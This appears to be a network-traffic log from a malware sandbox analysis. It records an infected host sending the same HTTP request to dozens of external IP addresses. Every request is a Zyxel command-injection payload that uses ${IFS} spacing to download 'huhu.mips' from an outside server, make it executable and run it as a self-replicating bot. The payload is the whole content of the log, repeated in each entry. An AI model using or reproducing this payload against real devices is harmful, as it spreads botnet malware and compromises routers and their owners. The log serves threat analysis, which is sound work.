                                            Feb 2, 2024 06:21:27.942153931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8457192.168.2.1533726170.47.198.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942189932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8458192.168.2.153305885.183.6.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942236900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8459192.168.2.155618299.43.56.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942277908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8460192.168.2.155999845.137.97.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942327023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8461192.168.2.154437631.11.211.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942357063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8462192.168.2.1536972125.76.26.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942390919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8463192.168.2.153573473.182.219.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942440987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8464192.168.2.153352460.31.131.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942471981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8465192.168.2.153755853.37.26.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942522049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8466192.168.2.1535568164.176.149.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942568064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8467192.168.2.154792812.47.170.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942581892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8468192.168.2.1555760160.117.161.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942606926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8469192.168.2.154671062.23.240.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942692041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8470192.168.2.1541350177.10.172.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942725897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8471192.168.2.1539944198.120.205.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942755938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8472192.168.2.154227262.187.84.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942807913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8473192.168.2.1538186163.231.231.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942819118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8474192.168.2.154344445.74.87.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942847967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8475192.168.2.155960282.142.78.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942903042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8476192.168.2.154515887.38.92.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942940950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8477192.168.2.155108088.66.112.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942975044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8478192.168.2.15540461.25.52.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.943027973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8479192.168.2.153983459.188.126.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.943074942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8480192.168.2.154238036.161.206.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.943101883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8481192.168.2.1548594149.212.224.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.943149090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8482192.168.2.1536626181.211.142.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.943173885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8483192.168.2.1551460189.179.65.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.943228006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8484192.168.2.1544906195.113.216.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.944111109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8485192.168.2.155857088.188.224.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.944626093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8486192.168.2.1554624192.240.43.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.946947098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8487192.168.2.154408692.165.41.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.946986914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8488192.168.2.155183293.148.221.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947036028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8489192.168.2.155363634.208.86.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947078943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8490192.168.2.156073657.200.182.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947132111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8491192.168.2.1542160138.78.117.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947194099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8492192.168.2.1547206181.251.149.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947204113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8493192.168.2.1551804141.199.7.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947240114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8494192.168.2.1560548187.158.229.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947273016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8495192.168.2.153696024.176.189.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947319031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8496192.168.2.1547486102.218.106.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947359085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8497192.168.2.154842463.130.51.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947458982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8498192.168.2.1548006202.18.0.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947499990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8499192.168.2.1545422163.64.199.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947542906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8500192.168.2.1550806144.119.79.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947571039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8501192.168.2.154507062.212.248.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947624922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8502192.168.2.155805044.84.192.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947653055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8503192.168.2.1535894205.30.90.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947684050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8504192.168.2.1549804167.81.117.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947701931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8505192.168.2.154400613.88.200.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947751999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8506192.168.2.1537740217.113.50.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.947788954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8507192.168.2.153512676.63.66.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957248926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8508192.168.2.1533062162.233.20.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957283020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8509192.168.2.1557498120.164.168.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957319021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8510192.168.2.1537490114.246.63.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957349062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8511192.168.2.1552788168.158.97.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957384109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8512192.168.2.1555172158.170.189.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957422972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8513192.168.2.155394266.114.81.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957475901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8514192.168.2.153613480.249.139.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957520962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8515192.168.2.155987048.103.184.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957556009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8516192.168.2.1537106122.18.204.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957633972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8517192.168.2.153352084.212.36.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957673073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8518192.168.2.1559658176.38.175.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957709074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8519192.168.2.154632675.64.122.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957752943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8520192.168.2.153586283.222.242.134443
                                            TimestampBytes transferredDirectionData
